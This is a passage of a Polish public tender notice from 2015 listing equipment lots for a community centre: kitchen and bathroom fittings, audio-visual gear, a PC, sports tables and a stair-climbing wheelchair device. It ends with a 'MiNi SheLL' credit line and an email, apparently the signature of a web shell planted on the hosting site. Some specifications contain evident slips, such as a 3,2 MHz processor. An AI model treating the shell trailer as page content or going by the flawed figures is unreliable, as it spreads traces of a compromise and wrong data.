-	Układ chłodzenia: dynamiczny
-	Metoda odszraniania: odszranianie automatyczne
-	Zakres temperatury: +1°C do +15°C 
-	Materiał obudowy/kolor: stal/srebrny
-	Materiał drzwi: stal szlachetna 
-	Drzwi pełne
-	Materiał wnętrza: tworzywo sztuczne w kolorze białym
-	Rodzaj sterowania: sterowanie mechaniczne
-	Wskaźnik temperatury: zewnętrzny cyfrowy
-	Oświetlenie wewnętrzne: żarówka
-	Regulowane półki: min.4szt.
-	Obciążenie półek: min.60 kg
-	Zamek
-	Klasa klimatyczna: SN
-	Czynnik chłodniczy: R 600a
-	Moc znamionowa: 1,1 A/ 120 W
-	Częstotliwość: 240 V 
Ilość zamawianych sztuk: 1.
7. Wyposażenie kuchni - taboret gazowy, wykonany ze stali nierdzewnej, kolor inox/srebrny.
Dane techniczne: 
-	moc całkowita: 9kW
-	przyłącze gazu: R1/2
-	wymiar: min. 6000x600x400
-	palnik z zabezpieczeniem przeciw wypływowym
-	palnik pilotujący
-	energooszczędny palnik 
Ilość zamawianych sztuk: 1
8. Wyposażenie kuchni - zlewozmywak dwukomorowy z ociekaczem,  wykonany ze stali nierdzewnej. 
Ilość zamawianych sztuk: 1.
9. Wyposażenie łazienek - lustro, ze szkła bezbarwnego, srebrne o szlifowanych krawędziach i wymiarach 35x55cm z uchwytem do zawieszenia.
Ilość zamawianych sztuk: 3.
10. Wyposażenie łazienek - pojemnik na mydło, wieszany na ścianie, wykonany ze stali nierdzewnej o pojemności 0,5 l.
Ilość zamawianych sztuk: 2.
11. Wyposażenie łazienek - pojemnik na ręczniki papierowe, wieszany na ścianie, wykonany ze stali nierdzewnej o wymiarach 30x30cm.
Ilość zamawianych sztuk: 2.
12. Wyposażenie łazienek - pojemnik na papier toaletowy typu POP, wieszany na ścianie, wykonany ze stali nierdzewnej, średnicy 250mm.
Ilość zamawianych sztuk: 3.
13. Wyposażenie łazienek - szczotka do WC, wieszana na ścianie, wykonana ze stali nierdzewnej.
Ilość zamawianych sztuk: 3.
14. Wyposażenie łazienek - kosz na śmieci, stojący, wykonany ze stali nierdzewnej 
o średnicy 25cm i wysokości 35cm
Ilość zamawianych sztuk: 4.
15. Wyposażenie świetlicy- kosz na śmieci, stojący, wykonany ze stali nierdzewnej 
o średnicy 35cm i wysokości 55cm.
Ilość zamawianych sztuk: 7.
16. Basen na garnki 
Basen jednokomorowy  wykonany ze stali nierdzewnej. Przeznaczony do wyposażenia zapleczy kuchennych we wszystkich obiektach gastronomicznych tj. stołówki, bary, restauracje, jadłodajnie, bary szybkiej obsługi itd. Służy do mycia dużych garnków, pojemników GN, termosów itp. Blat basenu wykonany z blachy o grubości 1,2÷1,5 mm. Dno komory wyprofilowane w sposób zapewniający całkowity spływ wody. Tył basenu wyposażony w rant o wysokości min 4 cm, który zabezpiecza przed zsuwaniem się odpadków z części roboczej w szczeliny przy ścianie kuchni. Stopki z regulacją wysokości.
Dane techniczne:
- wymiary: szerokość : 60 cm, długość  120 cm, wysokość: 85 cm, głębokość komory: 30 cm
Ilość zamawianych sztuk: 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt radiowo-telewizyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt radiowo-telewizyjny wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1.Wyposażenie świetlicy - telewizor LCD 47cali, Full HD
Rozdzielczość: 1920x1080 
Obsługa MPEG 4
Teletekst: tak
Nagłośnienie:  -minimum 2 głośniki stereo, moc głośników; min. 10 W
Złącza: -HDMI
-Wejścia Euro: tak
-Wyjście audio: tak 
-Wyjście słuchawkowe: tak
-USB
Konstrukcja: -podstawa i montaż ścienny
Ilość zamawianych sztuk: 1 szt.
2. Wyposażenie świetlicy - radioodtwarzacz CD 
Urządzenie z portem USB i oddzielnymi głośnikami. Odtwarzanie mp3 / CD-R / CD-RW, port USB, tuner FM/AM, pamięć 30 stacji.
Dane techniczne:
Wejście anteny zewnętrznej: tak 
Cyfrowy wyświetlacz LCD: tak
Moc wyjściowa: skuteczna (RMS): 2x20W
Wyjście słuchawkowe: tak 
Pilot: tak
Ilość zamawianych sztuk: 1 szt.
3. Wyposażenie świetlicy - odtwarzacz DVD
Dane techniczne:
Obsługiwane formaty płyt: BD-R, BD-RE, DVD?R, DVD?RW, CD-R, CD-RW, Audio CD, DVD-Video, Xvid, DivX,
Obsługiwane formaty plików: .jpg, .mp3, 
Obsługiwane standardy audio: Dolby Digital Plus, DTS
Wyjścia: USB, HDMI
Ilość zamawianych sztuk: 1 szt.
4. Wyposażenie świetlicy - zestaw kina domowego
Dane techniczne:
Odtwarzacz płyt DVD-Video, DVD-R, DVD-RW, DVD+R, DVD+RW, CD-DA, CD-R, CD-RW formaty multimedialne DivX, XviD, JPEG, MP3, WMV i WMA 
Obsługiwane standardy audio: Dolby Digital, Dolby ProLogic II, DTS
Wyjścia: USB Host, HDMI, komputerowe, kompozytowe, wejście/wyjście optyczne, wejście/wyjście audio, wejście/wyjście scart.
Głośniki:
-	system głośników - 5.1
-	głośniki składowe - 2 głośniki surround , 2 głośniki przednie , głośnik basowy , głośnik centralny
Ilość zamawianych sztuk: 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Urządzenia komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Wykonawca udziela minimum 24 miesięcznej gwarancji jakości na dostarczony sprzęt komputerowy z oprogramowaniem. Okres gwarancji  rozpocznie się od daty odbioru przedmiotu umowy. 
2. Oprogramowanie komputerowe musi posiadać właściwe licencje. 
3. Urządzenia dostarczone zostaną wraz ze wszystkimi akcesoriami niezbędnymi do umożliwienia ich pracy. Wraz z urządzeniami dostarczone będą instrukcje obsługi i karty gwarancyjne.
4. Szczegółowe warunki gwarancji określają karty gwarancyjne dostarczone przez Wykonawcę.
5. Gwarancja nie może ograniczać praw Zamawiającego do instalowania, reinstalowania, konfiguracji i rekonfiguracji dostarczonego oprogramowania przez przeszkolonych pracowników Zamawiającego, o ile jest to zgodne z warunkami licencji udzielonej przez producenta oprogramowania. 
6. Gwarancja nie może ograniczać praw Zamawiającego do instalowania i wymiany 
w zakupionym sprzęcie standardowych kart i urządzeń przez wykwalifikowanych pracowników zgodnie z zasadami sztuki w tym zakresie. 
7. Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Wyposażenie świetlicy - komputer stacjonarny PC z monitorem i klawiaturą
Dane techniczne:
Zainstalowany system operacyjny:	Windows
Procesor:	4 rdzeniowy powyżej 3,2 MHz
Pamięć standardowa	4 GB DDR3 1600 MHz
Napędy optyczne	Nagrywarka DVD z interfejsem SATA
Wewnętrzny dysk twardy	Dysk SATA min. 1 TB 7200 obr./min
Karta grafiki	DDR 5 (256-bit) - na układzie Radeon HD 6850 lub równoważnym
Dźwięk	zintegrowany z płytą główną
Napęd dyskietek	Czytnik kart pamięci w miejscu FDD
Gniazda rozszerzeń	minimum 1 gniazdo PCI na płycie głównej
Rozszerzenie pamięci	Możliwość rozbudowy do 8 GB
Interfejs sieciowy	Wbudowana karta Gigabit Ethernet
Oprogramowanie
Zainstalowane oprogramowanie	pakiet office (word, excel, powerpoint)
Obudowa	MIDI Tower
Klawiatura	Bezprzewodowa (możliwy komplet z myszą)
Urządzenie wskazujące	Bezprzewodowa (możliwy komplet z klawiaturą)
Zasilanie zewnętrzne	Zasilacz o mocy minimum 400W
Parametry ogólne monitor
Typ matrycy: 	LED
Matryca błyszcząca: 	Nie
Przekątna ekranu [cal]: 	24
Nominalna rozdzielczość [px]: 	1920 x 1080
Złącza
D-Sub i DVI:	TAK
Ilość zamawianych sztuk: 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzęt sportowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt sportowy wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1.	Wyposażenie świetlicy - stół do tenisa
Dane techniczne:
-	stół tenisowy wewnętrzny (do suchych pomieszczeń).
-	siatka,
-	pozycja play-back.
-	4 pojedyncze kółka transportowe.
-	hamulce bezpieczeństwa x 2 (po przekątnej).
-	uchwyty na piłki i rakietki.
Ilość zamawianych sztuk: 1 kpl.
2.	Wyposażenie świetlicy - piłkarzyki
Dane techniczne: 
-	wymiary minimalne:130 x 70 x 80 cm, 
-	płyty boczne: płyta MDF, grubość minimalna: 14 mm, szerokość: 30-40 cm,  
-	drążki zawodników: chromowana stal, 
-	łożyska kulkowe, 
-	stopki poziomujące.
Ilość zamawianych sztuk: 1. 
3.	Wyposażenie świetlicy - stół bilardowy wraz z niezbędnymi akcesoriami
Dane techniczne:
- blat wykonany z płyty kamiennej jednolitej,
- wymiary: pole gry: 127x254cm,
- możliwość regulacji poziomu,
- wyposażenie: kije (min.6), bile (komplet do pool-a), kreda, podpórka, trójkąt, 
końcówki (10 sztuk).
Ilość zamawianych sztuk: 1.
4. Wyposażenie świetlicy - stół do tenisa  kamienny granitowy 
Wymiary[m]: dł. 2,8; szer. 1,5; wys. 0,80; strefa bezpieczeństwa 5,5x8,8; 
liczba użytkowników 4. 
Zamówienie obejmuje również montaż sprzętu sportowego.
Dane techniczne:
- blat stołu szlifowany, zaimpregnowany specjalnym lakierem,
- siatka stalowa, ocynkowana ogniowo,
- całość wsparta na konstrukcji stalowo-betonowej.
Ilość zamawianych sztuk: 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Urządzenie do transportu osób na wózkach inwalidzkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na urządzenie do transportu osób na wózkach inwalidzkich wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Urządzenie o konstrukcji metalowej malowanej proszkowo z zasilaniem akumulatorowym umożliwiające transport osób na wózkach inwalidzkich po schodach oraz stromych pochylniach. Ilość zamawianych sztuk: 1.
Minimalne wymagane parametry urządzenia określone dla Scalmobilu S20 - do transportu schodowego w komplecie z markowym wózkiem aktywnym i specjalnymi uchwytami:

Maksymalne obciążenie 	120 kg, 1 osoba wraz z wózkiem
Waga	24,5 kg
Prędkość	6-16 stopni/min.
Zasięg	Do 300 schodów
Schody	Ciągi proste, zakręcające, strome, wąskie, z dowolnego materiału i ze stale przymocowanymi pokryciami, do wnętrza
Napęd	Silnik elektryczny 176W
Baterie	2x12 V3/4 Ah, Dryfit-Typ (bezobsługowe, żelowe)
Wózki	Model manualny

Dopuszcza się urządzenie równoważne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com